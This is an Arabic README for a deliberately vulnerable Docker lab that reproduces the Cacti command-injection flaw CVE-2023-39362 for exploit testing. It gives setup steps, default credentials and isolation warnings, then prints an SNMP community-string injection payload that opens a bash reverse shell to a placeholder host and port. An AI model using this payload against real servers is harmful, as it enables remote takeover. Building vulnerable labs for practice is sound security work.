
تحذير: هذا تطبيق ضعيف لاختبار استغلال ثغرة حقن الأوامر في Cacti (CVE-2023-39362). قم بتشغيله على مسؤوليتك الخاصة!
هذا تطبيق ضعيف لاختبار استغلال ثغرة Cacti (CVE-2023-39362).
يحتوي هذا التطبيق على ثغرات أمنية خطيرة. قم بتشغيله على مسؤوليتك الخاصة! يُوصى باستخدام بيئة مدعومة ومحمية (مثل جهاز افتراضي بلقطة حديثة وشبكة مخصصة للمضيف فقط). لا تقم بتحميل هذا التطبيق إلى أي خوادم موجهة للإنترنت، لأنها ستتعرض للاختراق.
إخلاء مسؤولية: لا أتحمل المسؤولية عن الطريقة التي يستخدم بها أي شخص هذا التطبيق. الغرض الوحيد من هذا التطبيق هو أن يكون سيناريو اختبار لاستغلال CVE-2023-39362 ولا ينبغي استخدامه بشكل ضار. إذا تم اختراق خادمك عبر تثبيت هذا التطبيق، فهذه ليست مسؤوليتي، بل مسؤولية الشخص (أو الأشخاص) الذين قاموا بتحميله وتثبيته.
فيما يلي خطوات إعداد البيئة:
docker compose up -d لبدء التشكيل.admin/admin.admin.guest.guest لتجربة الاستغلال.سيتم تسمية الحاوية vuln-cacti.
اسم المضيف لجهاز SNMP الاختباري هو monitored_snmp_device.
لـ إزالة البيئة استخدم الأمر docker compose down.
يمكن العثور على دليل التثبيت الرسمي لـ Cacti هنا.
يتوفر سبب جذري مفصل للثغرة في التقرير الأمني الأصلي أو في منشور مدونتي.
(هذا مجرد استغلال واحد محتمل)
public\' ; touch /tmp/m3ssap0 ; \'./tmp.للحصول على شل عكسي، يمكن استخدام حمولة مثل التالية.
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
هذا المشروع مرخص بموجب Unlicense - راجع ملف LICENSE للحصول على التفاصيل.